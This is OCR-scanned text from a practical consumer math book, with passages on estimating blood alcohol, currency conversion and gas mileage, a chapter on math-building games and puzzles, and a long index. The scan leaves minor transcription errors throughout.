of alcohol all have about the same impact on your BAC. They each 
add about 0.02 percent to your BAC. The smart math here is to 

go to your state’s Department of Motor Vehicles website and find 
a BAC chart. These charts usually show gender, weight, and the 
number of drinks that will mess you up. Memorize the numbers 
that apply to you, and should you drink, count your drinks and 
then stop. Also, you can find a very good online BAC calculator at 
http: //bloodalcoholcalculator.org. 


Never operate a motor vehicle (including a boat) if you’re impaired 
by alcohol. The idea is to drink very moderately, if at all. You’ll be 
a safer driver, and you’ll avoid an arrest for driving under the 
influence (DUD or driving while impaired (DWI). 


Dollars to Pounds or Euros 


The exchange rate between currencies changes a little every day, 
but in general, a pound (£ or GBP) is worth about $1.50 anda 
euro (€ or EUR) is worth about $1.20. To convert from euros to 
dollars, multiply any price by 1.2. For example, if you see an item 
priced at €10.00, that’s the equivalent of $12.00 (10.00 x 1.2 = 12.00). 
A €25.00 item works out to be $30.00. To convert from pounds to 
dollars, multiply the price by 1.5. For example, if you see an item 
priced at £10.00, that’s the equivalent of $15.00 (10.00 x 1.5 = 15.00). 
A £25.00 item is $37.50. 
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y If you carry a smartphone that works in Europe, use a currency 


converter app to find the exact exchange rate. Or you can just ask 
the staff at your hotel. 


Gas Mileage 


You can estimate gas mileage two ways: The first way is to divide 
the miles you can drive on a tank of fuel by the capacity of the 
tank. But this method is imprecise for a variety of reasons, two 
being that you never really know what a “full” tank is and it doesn’t 
account for driving conditions. 


A quick and easy way to calculate miles per gallon is to do a little 
test run. Say you have a 12-gallon gas tank (info you can get from 
your owner’s manual). Fill the tank up, set your trip odometer to 
zero, and take a short day trip. When the fuel gauge registers 3/4, 
look at the trip meter to see how far you’ve gone. If the gauge says 
90 miles, you have driven 90 miles on 1/4 tank of gas, or about 
three gallons. Divide 90 by 3 to find that you're getting about 30 mpg. 
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Chapter 16 


Ten Activities That Build 
Math Skills 


In This Chapter 


Performing powerful parlor tricks 
Doing what is logical, Captain 
Solving math puzzles and playing math games online 


M an (and woman) doth not live by bread alone. That is, life 


involves more than work and chores. So what do you do 
with your leisure time? When there’s nothing on TV, try reading 
and games. Reading entertains, educates, and edifies. However, 
math games help to make you a math whiz. Here are ten games and 
math-related activities that can get you there. 


Playing Sudoku 


Sudoku is a number placement puzzle that requires logic anda 
quick grasp of the numbers 1-9. There’s no adding, subtracting, 

or any other math operation. You simply have to determine what 
number is and isn’t in a row, column, or subregion. It’s as simple as 
tic-tac-toe, but it’s an excellent challenge for the thinking person. 


The easy Sudoku games are fast; the hard ones, not so much. You 
can find Sudoku puzzles in the newspaper, online, in apps for 
smartphone or tablet, and even in in-flight magazines on the airline. 
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Playing Elementary Math 
Games on the Internet 


You could go to many Internet sites to learn math rules, formulas, 
and step-by-step procedures. But life short, so instead play some 
math games. Visit http: //www. coolmath-games.com. 


Here you'll find money games, number games, logic games, and 
much more. All free! And if you think these “children’s” games are 
easy to master, try playing a few. Even “Lemonade Stand” can be a 


difficult business resource management exercise. 


Working through Logic Puzzles 


<r 


You may have grown up with logic puzzles (you know, the kind 
that asks you to match up people with houses and pets). The 
typical result is something like “The Swede lives in the red house 
and owns a dog.” At first, these games strain your brain, as they 
should. Later, your skills reduce the pain and you get a gain. 


Try Sherlock, one of the best of the logic puzzles. Sherlock and 
many other logic games are at Everett Kaser’s website (http: // 
www.kaser.com). In my opinion, he’s the undisputed master of 
logic puzzles. 


Noting the Birthday Paradox 


The Birthday Paradox isn’t so much a game as a statistical 
probability that will baffle and amaze your friends. Basically, this 
paradox states that, in a room full of people, there’s an excellent 
chance that two of them have the same birthday. When you have 
367 people in the room, the probability is 100 percent, because 
there are at the most 366 days in a year. Interestingly, probability 
calculations show that the likelihood of a match is 99 percent when 
only 57 people are in the room. And you might win a bet or two 
knowing this: The probability is 50 percent when only 23 people in 
the room. 


That 50 percent probability is as good as a coin flip, but the 
birthday paradox is much more dramatic! 


Chapter 16: Ten Activities That Build Math Skills 25 f 


Knowing the Value of Pi 


Knowing the mathematical constant pi (7) may not have a lot of 
practical uses unless you’re a mathematician or a scientist, but it 
puts you in a relatively small group of people who, upon hearing 
the word “pi,” don’t think immediately of apple or pecan. 


Here are three things that any self-respecting pi lover needs to 
know: First, pi allows you to the calculate areas and circumferences 
of circles and the volumes of cylinders and spheres. Second, pi’s 
value is approximately 3.14, but no one knows the absolute value 
of pi because the decimal places go on forever. (If you want extra 
credit, memorize pi to 12 decimal places: 3.141592653589.) Third, 
March 14th (3/14) of every year is National Pi Day. 


Guessing a Friend’s Age 


EAN 


Using a technique called a binary search, which comes from 
computer science, you can guess a friend’s age in a maximum of 
seven tries. To start, tell a friend, “I can guess your age in seven 
guesses or less. I’ll name a number, and you say ‘high, ‘low,’ or ‘yes.”” 


Start in the middle of a range of age values. If you were using the 
ages 1-64, you’d start with 32 and then continue to halve the 
search range at every “high” or “low” response. 


Say for example that, when you say “32,” your friend says “Low.” 
You halve the search range (which now becomes 33-64) and pick 
the number in the middle of the new range: “48.” If the answer isn’t 
“yes,” halve the search range again. Worst case, it'll take you seven 
guesses to get to the right age. 


You can guess the age in even fewer tries if the person is obviously 
not a child or teenager. Start the search range at age 20. 


Playing Hidden Object Games 


A hidden object game (HOG) is a type of computer game where 
you have to find items from a list that are hidden in a scene, and 
there are numerous scenes. Finding the objects advances a story, 
and in the story, you need to place found objects to make something 
happen. The big game is interspersed with fun mini-games, too. 
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If a hidden object game doesn’t test your investigative, reasoning, 
and sequencing skills, it’s hard to say what will. 


The games are very inexpensive, and you can extend play over 
hours or days. You can find these games in lots of places, but one of 
the best is Big Fish Games. Visit http: //www.bigfishgames.com. 


Flipping Coins 


Re S UZA 


2/1 OG) 


Flipping a coin consist of tossing a coin into the air so it rotates 
several times. In some games, a participant “calls” it in the air as 
coming up “heads” or “tails.” Play a simple (almost mindless) game 
to learn a lesson in probability. 


Flipping a coin has two outcomes — heads or tails. The probability 
of one side coming up is 1 in 2, or 50 percent. Flip a coin a few 
dozen times, and you'll see that each side comes up about half the 
time. So what happens if the coin comes up heads 100 times ina 
row (for example)? That must mean that the next flip has to be 
tails. Nope, the various flips are each independent events, so the 
probability is 50 percent every time. 


The Romans called coin flipping navia aut caput (“ship or head”), 
because that’s what was on their coins. They considered the 
outcome to be expression of divine will. Today, a coin flip (‘the 
toss”) is used in football games to decide which team gets first use 
of the ball. 


Playing Games with Vour Kids 


Even very young children benefit from math games, and when 
you help them, you improve your skills, too. Begin with simple 
sequencing games, such “This Little Piggy” (“This little piggy went 
to market; this little piggy stayed home...” and so forth). Later, 
you and your child can sing “This Old Man,” (“This old man, he 
played one, he played knick-knack on my thumb”) together. After 
that, use Sesame Street counting games to help teach both math 
skills and computer skills. Visit http: //pbskids.org/games/ 
counting.html. 
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Playing Angry Birds 


Angry Birds is one of the most popular games for smartphones and 
tablets ever made. Over 12,000,000 copies have been purchased at 
the Apple App Store, and it’s available for Android devices, too. 


Angry Birds is excellent for developing your mental math skills, 
and you won't even know you’re doing so. You figure trajectories 
without thinking very much about them. Economy is important, 
too, as you get more points for knocking down the pigs’ structures, 
using as few birds as possible. 


Who knew that shooting wingless birds at pigs using a slingshot 
would excite so many people? And the “purchase” price is $0.00, 
unless you upgrade. 
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© Special Characters 
and Numerics ° 


. (dot) symbol, 31 
n (pi) 
as a constant, 29 
defined, 42 
value of, 251 
y (square root), 31 
2r (diameter), 40-41 
12b-1 fee, 197 
21/blackjack game, 157-158 
401 (k) contribution plan, 193-194 
403 (b) contribution plan, 193-194 
529 plan (education savings plan), 182 


eAe 


accounting, 223-224 
acute angle, 38 
acute triangle, 39-40 
adding 
commutativity in, 11 
defined, 11 
fractions, 15 
numbers, 11 
tips for, 60-61 
variables, 31 
addition. See adding 
adjustable rate mortgage (ARM), 171 
AGI (adjusted gross income), 231-232 
alcohol 
calorie content of, 117 
measuring BAC, 246 
algebra 
constants, 29 
equations, 30-35 
expressions, 29-30 
overview, 27-28 
variables, 28-29 
algebraic equations 
adding and subtracting variables, 31 
defined, 30 
multiplying and dividing variables, 31 


order of operations, 33-34 
powers, 31 
solving, 32-33 
square roots (y), 31 
American system, measurement, 
50-51, 98 
amortization, 174-175 
angles, types of, 38 
Angry Birds, 253 
annual percentage rate (APR), 180 
Apache OpenOffice website, 165 
appreciation (investment), 185 
APR (annual percentage rate), 180 
area, 24-25, 41-42, 130-131 
arithmetic mean, 52, 66 
ARM (adjustable rate mortgage), 171 
ATM (debit card), 87, 169 
auto insurance, 209-210 
average 
bowling, 66-67 
defined, 52, 66 
formula, 52 
grade point, 68-69 
versus median, 53 
misuse of, 68 
steps for finding, 52 
axes, 36 


e Beo 


BAC (blood alcohol content), 246 
back-end load, 197 
balance, financial, 168, 180 
balancing checkbook, 167-170 
bank card. See credit card 
bar graph, 22 
basic operations. See adding; dividing; 
multiplying; subtracting 
betting 
best in craps, 159 
bets, types of, 155 
blackjack/21, 157-158 
counting cards, 158 
house edge/advantage, 155-156, 
159-160, 188 
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betting (continued) 
hunch play, 158 
insurance, 158 
odds, 154 
payout, 156 
roulette, 156 
slot machine/one-armed bandit, 
156-157 
worst casino, 160 
big box stores, 94-96 
Big Six (Wheel of Fortune), 160 
binary search, 251 
Birthday Paradox, 250 
blackjack/21game, 157-158 
blood alcohol content (BAC), 246 
BMI (body mass index) website, 121 
bond/bond funds, 184, 197, 201-202 
bowling, 66-67 
box, 43 
boxcars (roll of dice), 159 
broker, 199 
budget, 163-167 
bulk buying, 106-107 
business 
accrual basis accounting, 224 
cash basis accounting, 224 
costs, 218 
deductions, 226-227 
discounts, 217 
expenses, 218 
gross pay, 224-225 
gross profit, 219 
income, 218 
IRS website, 228 
making change, 220-221 
markups, 216-217 
net pay, 226-227 
net profit, 220 
payroll deduction formula, 
226-227 
pre-tax profit, 220 
profit margin, 219 
project accounting, 223-224 
selling price, 215-216 
time, classes of, 225 
time and materials, 217-218 
time clock, 222-223 
timesheet, 221-223 


tracking time, 221-223 

W-4, 227-228 

withholding pay, 227-228 
business line (insurance), 209 
buydown (interest), 172 
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c (circumference), 40—42 
calculating formula. See formula, for 
calculating 
calories 
burn rate, 122-124 
calculating, tips for, 115-116 
defined, 115 
empty, 113 
formula for calculating, 115 
formula for losing weight, 117-118 
per serving on label, 112 
in processed foods, 113 
recommended daily, 111, 113-114 
in various foods, 110, 115, 117 
websites, 114, 116-117 
car insurance, 209-210 
car loan, 176-177 
carbohydrates, 110, 117 
Cartesian coordinate system, 36 
cash basis accounting, 224 
cash value (insurance), 213 
CD (certificate of deposit), 181 
Celsius to Fahrenheit, converting, 51 
Center on Budget and Policy 
Priorities website, 22 
certificate of deposit (CD), 181 
charge-a-plate, 177 
chart/graph, 20-22 
check (payment), 87 
checkbook 
balancing, 168-170 
using register, 168-170 
using symbols in register, 169 
CHG (monthly fees), 169 
circle 
area, calculating, 42 
defined, 40 
parts of, 40-41 
perimeter, finding, 43 
circumference (c), 40—42 


Class A/B/C shares (mutual funds), 
197-198 
closeout/clearance sale, 80 
co-insurance, 204 
comeout roll (roll of dice), 159 
commission, 199 
common denominator, 15 
common fraction, 12-13 
common stocks, 184 
commutativity in adding, 11 
complex carbohydrates, 110 
compound interest, 189-190 
constant (algebra), 29 
Consumer Price Index (CPI), 239 
conventions used in this book, 2-3 
conversion factor, 50-51 
converting 
annual expense to monthly, 166 
Celsius to Fahrenheit, 51 
decimals to fractions, 18 
dollars to euros, 246-247 
dollars to pounds, 246-247 
drops to fluid ounces, 127-128 
Fahrenheit to Celsius, 51 
fractions to decimals, 18 
fractions to percentages, 19 
kilometers to miles, 244 
metric to American units, 51 
miles to kilometers, 244 
percentages to fractions, 20 
percentages to ratios, 20 
ratios to percentages, 20 
tsp/tbsp to mL, 127 
weekly salary to monthly, 166 
coordinate system, Cartesian, 36 
copay (insurance), 204 
cord (cubic measure), 44 
counting 
cards, 158 
kids’ games, 252 
numbers, 10 
overview, 9-10 
coupon, 81-82, 84 
CPI (Consumer Price Index), 239 
craps (roll of dice), 159 
credit card 
incentives, 180 
interest rates, 179-180 
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monthly balance, calculating, 180 
overview, 179 
paying down, 180-181 
types of fees, 179 
using, pros and cons, 87-88 
using wisely, tips for, 88-89 
cross-multiplying, 48-49 
cruise insurance, 214 
cuboid, 43—44 
cutting lawn, 133-134 
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d (diameter), 40-41 
debit card (ATM), 87, 169 
decimal fractions, 10, 13, 18 
deductible 
auto insurance, 210 
health insurance, 204, 212-213 
income tax, 232, 233-236 
overview, 204 
deductions (paycheck), 226-227 
deed of trust (mortgage), 170-176, 214 
defined benefit/contribution plans 
(retirement), 192-194 
denominator 
100 as, 19 
common, 15 
inverting with numerator, 16-17 
making common, 15-16 
multiplying, 16 
same as numerator, 14 
deposit (DEP), 169 
depreciation, 76 
diagram, solving story/word 
problem, 25 
diameter (d), (2r), 40 
diet, 118, 120 
Dietary Reference Intake (DRI), 114 
dieting, versus diet, 120 
digital scale, 100 
digital timer, 100 
dining out, saving on, 84-85 
direct costs (business), 218 
discount, 85-86, 216-217 
discount points (interest), 172 
distance formula, 34, 144, 244 
distortions, statistical, 54-56 
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DIY (do it yourself), 138 
dividend, 200 
dividing 
by 5, 64 
by 10, 64 
defined, 12 
fractions, 16-17 
numbers, 12 
tips for, 63-64 
variables, 31 
division. See dividing 
do it yourself (DIY), 138 
don’t pass bet (craps), 159 
dot (.) symbol, 31 
double discounts, 86 
double down (blackjack/21), 158 
double time, 225 
down payment, 170 
DRI (Dietary Reference Intake), 114 
driving 
calculating gas mileage, 142, 247 
distance/speed/time formula, 144 
formula, arrival time, 144 
formula, average speed, 146 
formula, car repair, 147 
formula, distance traveled, 145-146 
fuel gauge, 142 
GPS, 145 
odometer, 145, 244 
speedometer, 146 
state of charge, 142 
vacation costs, 152-153 
driving under the influence (DUD), 246 
driving while impaired (DWD, 246 
durable goods, 76 
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education loan, 178 

education savings plan (529 plan), 182 

EFT (electronic funds transfer), 169 

Employee’s Withholding Allowance 
Certificate (W-4), 227-228 

Ending Redeemable Value (ERV), 198 

EOB (explanation of benefits), 212 

equilateral triangle, 40 

equivalencies, common, 99 


ERV (Ending Redeemable Value), 198 
estimated time of arrival (ETA), 145 
estimating 

value added tax, 65 

defined, 64 

paint for an area, 245 

sales tax, 65 

seating, 66 

servings for group, 90-91, 245-246 

techniques, 64-65 

tips, 66 

total grocery bill, 90 
exchange rate, 247 
exercising, 122-124 
expenses (business), 164, 218 
explanation of benefits (EOB), 212 
exponentiation, 31 
externalities (shopping), 94-95 
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factoring, 14 
Fahrenheit to Celsius, converting, 51 
fair odds bet, 155 
fats 
to avoid, 113 
benefits of, 110 
BMI, 121 
calorie content of, 117 
federal income tax (FIT), 226 
fee, 237-238 
finance, 163. See also investing 
financial instrument, 185-186 
first mortgage (deed of trust), 170 
FIT (federal income tax), 226 
fixed income securities, 184 
fixed-rate mortgage (FRM), 171 
flying costs (vacation), 151-152 
food. See also grocery store math; 
kitchen math 
benefits of various, 109-110 
calories in various, 117 
counting calories in, 115-116 
label, 111-112, 115 
RDA, 114-115 
to avoid, 113 
food label, 111-112, 115 


formula, for calculating 

adjusted gross income, 232 

amortization, 175 

area of circle, 42 

area of rectangle, 41 

area of square, 41 

area of triangle, 41-42 

average, 52 

average annual return (mutual 
fund), 198-199 

average price, 83 

average speed, 146 

BMI (body mass index), 121 

bond yield, 202 

car repair, 147 

Celsius to Fahrenheit, 51 

cost of fueling, 143 

credit card balance, 180 

difference, ideal and current 
weight, 120 

discount, 85-86, 217 

distance between, 34 

distance traveled, 145 

dividend yield, 200 

double discounts, 86 

driving costs, 152-153 

Fahrenheit to Celsius, 51 

fee, 238 

flying costs, 151-152 

future value, 190 

gross profit, 219 

half-pass technique (lawn cutting), 
133-134 

hidden costs, 78 

house edge/advantage, 156 

insurance premium, 213-214 

laying carpet, 134-135 

LTV (loan to value ratio), 173-174 

markup, 216-217 

medical/dental deductions, 235 

mileage, 142, 247 

net profit, 220 

painting room (area), 245 

payroll deduction, 226-227 

pizza amount for group, 245-246 

pre-tax profit, 220 

private mortgage insurance, 173-174 

probabilistic risk assessment, 206 

profit margin, 219 
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property tax, 172-173, 237 
ratio-proportion, 48 
sales tax, 236, 244 
story/word problem solution, 25 
taxable income, 232 
time and materials, 217-218 
time to destination, 144, 244 
tipping, 245 
unit price, 79-80 
volume (v), 44 
fractions 
adding, 15 
converting from percentages, 20 
converting to decimal fractions, 18 
in number line, 10 
reducing, 13-14 
types of, 13 
FRM (fixed-rate mortgage), 171 
front-end load, 197 
fuel, 142-143 
full-rotation angle, 38 
future value (investment), 190 
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gambling 
Big Six (Wheel of Fortune), 160 
blackjack/21, 157-158 
craps, 159 
house edge/advantage, 155 
keno, 160 
losing proposition, 188 
Lotto, 188 
odds, 154-155 
poker, 160 
roulette, 156, 160 
slot machine/one-armed bandit, 

156-157 

worst casino, 160 

games, math skill building 
Angry Birds, 253 
Big Fish Games website, 252 
Birthday Paradox, 250 
Everett Kaser website, 250 
flipping coin, 252 
guessing age, 251 
hidden object, 251-252 
Internet, 250 
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games, math skill building (continued) 


kids, 252 
logic puzzles, 250 
Sherlock, 250 
Sudoku, 249 
gas mileage, 142, 247 
GDP (gross domestic product), 
238-239 
generic product, 78 
geometry 
angles, 38-39 
Cartesian coordinate system, 36 
coordinate system, 35-36 
defined, 35 
line, 36-37, 44 
line segments, 37 
origin, 36 
perimeter, 42-43 
plane, 35 
point, 36 
quadrants, 36 
rays, 38 
shapes, 39-41, 45 
vertex, 38 
volume, 43-44 
global positioning system (GPS), 
145, 244 
GNP (gross national product), 238 
Google Maps website, 244 
government index, 238-239 
GPA (grade point average), 68-69 
GPS (global positioning system), 
145, 244 
Graunt, John, 206 
grid, 37 
grocery store math 
comparing packages, 92 
comparing square footage, 92 
comparing unit prices, 91 
comparing volume, 93 
estimating need, 90-91 
estimating total cost, 90 
gross domestic product (GDP), 
238-239 
gross national product (GNP), 238 
gross profit, 219 
growth funds, 197 
guessing age, 251 
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half-pass technique (lawn cutting), 
133-134 
health. See also weight, body 
calculating BMI, 121 
counting calories, 115-117 
defined, 109 
foods to avoid, 113 
insurance, 211-214 
managing weight, 117-118 
medication, 125-128 
nutrition needs, 110 
RDA (recommended daily 
allowance), 115 
reaching ideal weight, 118-120 
health insurance, 211-214 
health savings account (HSA), 182 
HELOC (home equity line of 
credit), 176 
hidden costs 
banking, 77 
defined, 76 
driving for vacation, 153 
examples of, 77-78 
formula for determining, 78 
travel, 77 
unbundling goods or services, 77 
hidden object game (HOG), 
251-252 
home equity line of credit 
(HELOC), 176 
home equity loan, 176 
home projects 
cutting lawn, 133-134 
do it yourself, 138 
laying carpet, 134-135 
mulching lawn, 131-132 
painting room, 135-136, 245 
pouring patio, 136-139 
seeding lawn, 130-131 
homeowners insurance, 210-211 
house edge/advantage 
American roulette, 156, 160 
Big Six (Wheel of Fortune), 160 
craps, 159 
defined, 155 
European roulette, 156 


Keno, 160 

losing due to, 188 

poker/video poker, 160 
HSA (health savings account), 182 
hunch play, 158 
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icons, explained, 5 
imperial system (British Imperial), 98 
improper fraction, 13-14 
income, 164-166, 231-232 
income funds, 197 
income generating (investment), 185 
income tax 
adjusted gross income, 231-232 
basic form (1040), 230-233 
deductions, 232, 234-236 
exemptions, 231, 232 
Form 1040, 230-233 
Form 1040 Schedule A, 234 
marginal rate, 233 
other taxes, 233 
overview, 230 
payment, 233 
refund/amount owing, 233 
tax owing, 232 
taxable income, 231-232 
total income, 231 
income tax deductions 
defined, 232 
donations to charity, 235 
formula for medical/dental, 235 
interest paid, 235 
itemizing, 234 
job expenses, 235-236 
losses, 235 
medical/dental, 235 
miscellaneous, 236 
taxes paid, 235 
website, losses, 235 
index funds, 197 
Individual Retirement Account 
(IRA), 192 
inflation/inflation rate, 187-188, 239 
insurance 
actuary, 205-206 
auto, 209-210 
business line, 209 
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cruise, 214 
determining premium, 208 
figuring risk, 205-207 
health, 211-213 
homeowners, 210-211 
life, 213-214 
life tables, 206 
moral hazard, 204 
mortality tables, 206 
non-medical health, 214 
overview, 203 
personal line, 209 
pet, 214 
PLPD, 209 
premium, 203-204 
private mortgage, 173-174, 214 
rationale, 205 
risk levels, 206-207 
state disability, 214 
terms, 204-205 
underwriters, 207 
unemployment insurance, 214 
insurance bet, 158 
insurance-based instrument, 186 
integer (whole number), 10 
interest 
calculating on bonds, 201 
CD (certificate of deposit), 181 
compound, 189-190 
defined, 170, 188 
on a fixed-rate mortgage, 171 
income tax deduction, 235 
monthly rate, 180 
rate, 171-172, 179-180 
reducing on mortgage, 175 
regular investment, 191-192 
regular savings account, 181 
simple, 189 
time value of money, 188 
using discount points, 172 
Internal Revenue Service (IRS) 
Form 1040, 230-233 
Internal Revenue Service (IRS) 
website, 195 
International System of Units (SD, 
51, 98 
inverting and multiplying fractions, 
16-17 
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investing 
appreciating versus income 
generating, 185 
beginning, 187 
bonds, 201-202 
common stocks, 184 
defined, 183 
depositing regularly, 191-192 
financial instruments, 185-186 
inflation, 187-188 
mixed, 185 
mutual funds, 196-199 
online calculator, 192 
pitfalls to avoid, 188 
present/future value, 190 
risk tolerance, 184 
savings accounts, 181-182 
stocks, 199-200 
investment. See also investing 
horizon, 184 
products, 184 
pyramid, 186-187 
investment-based instrument, 186 
IRA (Individual Retirement 
Account), 192 
IRS (Internal Revenue Service) Form 
1040, 230-233 
IRS (Internal Revenue Service) 
website, 195 
Ishango bone, 10 
isosceles triangle, 40 
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kcal. See calories 
Keno, 160 
keywords in word problems, 24 
kitchen math 
calculating per-serving costs, 
104-105 
choosing tools, 100 
estimating number of pizzas, 245-246 
evaluating buying in bulk, 106-107 
scaling recipes, 100-104 
understanding units of measure, 98 
using equivalences, 99 
using measuring spoons, 127 
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1 dength), measurement, 41, 43, 98 
labels 
medication, 125-128 
nutrition, 111-112 
labor, defined, 146 
layaway, 89 
laying carpet, 134-135 
lenders’ mortgage insurance, 
173-174, 214 
length (J), measurement, 41, 43, 98 
level loaded funds, 198 
level-premium insurance, 213 
LIBOR (London Interbank Offered 
Rate), 171 
license fee, 238 
lifetime maximum limits (insurance), 
205 
line (geometry), 36-37, 44 
line graph, 21 
line segments (geometry), 37 
liquid volume, 98 
loan 
amortizing, 174-175 
car, 176-177 
education, 178 
fixed term, 176 
home equity, 176 
home equity line of credit, 176 
mortgage as, 170 
payment elements, 170-174 
second mortgage, 176 
loan origination point, 172 
loan to value ratio (LTV), 173 
local stores, 94 
London Interbank Offered Rate 
(LIBOR), 171 
loose slots, 156 
LTV (loan to value ratio), 173 
lump sum payments, 175 


eMe 


making a wager, 154 
making change, 220-221 
managing weight, 117-118 


mandatory payroll deductions, 226 
marginal tax rate, 196, 233 
markup, 216 
mass (weight), 98 
mean, 52, 66 
measurement systems, 50-51, 98 
measuring spoons, 127 
median, 53, 68-69 
medical/dental deductions, 235 
Medicare, 226 
medication 
converting drops to fluid ounces, 
127-128 
converting tsp/tbsp to mL, 127 
dispensing liquid, 126-127 
forms of, 125-126 
reading labels, 125-126 
splitting tablets, 126 
medication label, 125-128 
medicine cup, 127 
medicine dropper, 127 
Medigap, 214 
mental math. See also games, math 
skill building 
estimating, 64-66 
finding averages, 66-68 
finding medians, 68-69 
tips for doing basic, 59-64 
MET (metabolic equivalent of 
task), 122 
metric system, 50-51, 98 
micronutrients, 110-112 
minerals, 110 
mixed fraction, 13 
money order, 87 
monthly fees (CHG), 169 
moral hazard (insurance), 204 
mortality tables, 206 
mortgage, 170-176, 214 
motor vehicle fee, 238 
mulching, 131-132 
multiplication. See multiplying 
multiplying 
by 5, 63 
by 10, 62 
cross, 48—49 
defined, 12 
fractions, 16 
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numbers, 12 
tips for, 61-63 
variables, 31 
mutual funds 
defined, 186, 196 
Ending Redeemable Value, 198 
fees, 197-198 
formula, average annual return, 
198-199 
load, calculating, 198 
shares, classes of, 197 
shorter investment horizons, 184 
types of, 197 
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natural (roll of dice), 159 
natural numbers, 10 
negative integer (whole number), 10 
net income (item), 219 
net pay, 226-227 
net profit, 220 
Nevada Megabucks website, 156 
no-load funds, 198 
non-medical health insurance, 214 
non-negative integer (whole 
number), 10 
number line, 10 
numbers, 10 
numbers to memorize, 59-60 
numerator, 12-14, 16-17 
nutrition 
benefits of proper, 110 
components of, 109-110 
foods to avoid, 113 
labels, reading to determine, 
111-112 
Nutrition Facts label, 111-112 
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obesity, 116 

obtuse angle, 38 
obtuse triangle, 39-40 
odds, 58, 154-155 

odds bet (craps), 159 
odometer, 145, 244, 247 
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one-armed bandit/slot machine, 
156-157 

online shopping, 94, 96 

operands, 11 

operations, basic. See adding; 
dividing; multiplying; 
subtracting 

opportunity cost, 138 

order of operations (algebra), 33-34 

organization of this book, 4-5 

origin (geometry), 36 

overhead, 218 

overtime, 225 


e po 


P/E ratio (price-to-earnings ratio), 
199-200 
painting room, 135-136, 245 
passline bet (craps), 159 
payment, options for, 86-87 
PayPal, 87 
payroll deductions, 226 
pedometer, 124 
penny stocks, 188 
per capita income, 239 
per-serving costs, 104-105 
percentage 
calculating discount, 82-83 
converting from fraction, 19 
converting to fraction, 20 
defined, 19 
as ratio, 20 
scaling recipe using, 101-103 
percentile, 53-54 
perimeter, 42-43 
permit fee, 238 
personal line (insurance), 209 
personal or public liability and 
property damage insurance 
(PLPD), 209 
pet insurance, 214 
pi (x) 
as a constant, 29 
defined, 42 
value of, 251 
pie chart, 21-22 


PITI (principal, interest, taxes, 
insurance), 170-174 
plane (geometry), 35 
planting lawn, 132-134 
PLPD (personal or public liability and 
property damage insurance), 209 
PMI (private mortgage insurance), 
173-174, 214 
point (geometry), 36 
points (Weight Watchers), 120 
poker, 160 
positive integers, 10 
pouring patio, 136-139 
PPO (preferred provider 
organization), 212 
PRA (probabilistic risk 
assessment), 206 
practical math, defined, 1 
pre-tax profit, 220 
preferred provider organization 
(PPO), 212 
premium (insurance), 203-204, 208 
present value (investment), 190 
price-to-earnings ratio (P/E ratio), 
199-200 
principal, interest, taxes, insurance 
(PITD, 170-174 
principal (loan), 170-171, 188 
private mortgage insurance (PMD, 
173-174, 214 
probabilistic risk assessment 
(PRA), 206 
probability 
Birthday Paradox, 250 
defined, 56 
flipping coin, 252 
formula, 56-57 
insurance use of, 205-207 
odds, 58, 154 
in throw of die, 154 
problems, word/story, 22-26 
profit/profit margin, 215, 219 
progressive jackpot, 156 
project accounting, 223-224 
proper fraction, 13-14 
property tax, 172-173, 237 
proportion, 48 


proportionality, dimensionless. See 
percentage 

proposition bet (craps), 159 

protein, 110, 117 

pseudo-seasonal sale, 80 

purchasing power, 239 

pyramid scheme, 187 


ede 

quadrants (geometry), 36 
quantity pricing, 79-80 
quartiles (percentile), 54 
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radius (r), 40 
ratio 

defined, 17, 48 

loan to value, 173 

odds, 58 

percentage expressed as, 20 

price-to-earnings, 199-200 
ratio-proportion 

applying to word/story problem, 25 

defined, 48 

equation, 48 

scaling recipe, 103-104 

steps, 49 
ratio-proportion equation, 48 
RDA (Recommended Daily 

Allowance) website, 115 
real-estate based instrument, 186 
reasonableness check, 25 
recipe scaling, 100-104 
Recommended Daily Allowance 
(RDA), 115 

rectangle, 39, 41, 43, 130-131 
reflex angle, 38 
regular (straight) time, 225 
regular savings account, 181 
retail price, 215 
retirement plans, 192-195 
riders, 214 
right angle, 38 
right triangle, 39-40 
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risk level (insurance), 206-207 
risk tolerance, 184 

roulette, 156, 160 

rounding numbers, 62, 65 
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salary, 166 
sale 
assessing claims, 81-86 
defined, 80 
percentage discount, 82-83 
types of, 80 
unit price, 106-107 
sales tax, 74-75, 236, 244 
SAT, 54 
savings account, 181-182 
savings-based instrument, 185 
scalene triangle, 40 
scaling recipe, 100-104 
SDI (state disability insurance), 
214, 226 
second mortgage (deed of trust), 176 
security (mortgage), 170 
seeding lawn, 131-132 
SEP IRA (small business employer 
plan), 192, 195 
serving size, 112, 116, 244-245 
shapes, basic, 39-41 
shopping 
in big box stores, 94 
calculating average price, 83 
calculating discounts, 82-83, 85-86 
considering hidden costs, 76-78 
determining how to pay, 86-89 
determining unit cost, 79-80 
finding total cost of acquisition, 
74-75 
finding total cost of ownership, 
75-76 
for groceries, 90-93 
impact on community, 94-96 
making tradeoffs, 78-79 
online, 94, 96 
sales tax, 74-75, 236, 244 
understanding coupons, 81-82, 84 
understanding sales, 80-86 
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SI (International System of Units), 
50-51, 98 
sick time, 225 
simple carbohydrates, 110 
simple fraction, 12-13 
SIMPLE IRA (small business employer 
plan), 192, 195 
SIT (state income tax), 226 
slot machine/one-armed bandit, 
156-157 
small business employer plan (SEP 
IRA), 192, 195 
small business employer plan 
(SIMPLE IRA), 192, 195 
snake eyes (roll of dice), 159 
SOC (state of charge), 142 
Social Security 
earning limit, 196 
Medicare payroll deduction, 226 
overview, 193, 195 
payroll deduction, 226 
speed, calculating, 34 
speedometer, 146 
spreadsheet, 164-165 
square 
calculating area of, 41 
defined, 39 
finding perimeter of, 43 
painting room measure, 135-136 
square root (y ), 31 
SSA (Social Security Administration) 
website, 195 
standard serving size, 112, 116 
state disability insurance (SDD, 
214, 226 
state income tax (SIT), 226 
state of charge (SOC), 142 
statistical fallacies, 54-56 
statistician, 51 
statistics (stats) 
average, 52 
defined, 51 
distortions using, 54-56 
obesity, affecting, 116 
step length formula, 124 
stock (equity) funds, 197, 199-200 
stores, types of, 93-96 
story/word problem, 22-26 
straight angle, 38 


student loan, 178 
subtracting 
defined, 11 
fractions, 16 
numbers, 11 
tips for, 61 
variables, 31 
subtraction. See subtracting 
Sudoku, 249 
sunk costs, 76 
swipe fee, 179 
systems of measurement, 50-51, 98 
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tally stick, 10 
tax 
bracket, 196, 233 
deferred, 193 
defined, 229 
versus fee, 237-238 
fees as, 237-239 
income, 230-236 
overview, 229 
property, 172-173, 237 
sales, 74-75, 236, 244 
on tips, 150 
TCA (total cost of acquisition), 74-75 
TCO (total cost of ownership), 75-76 
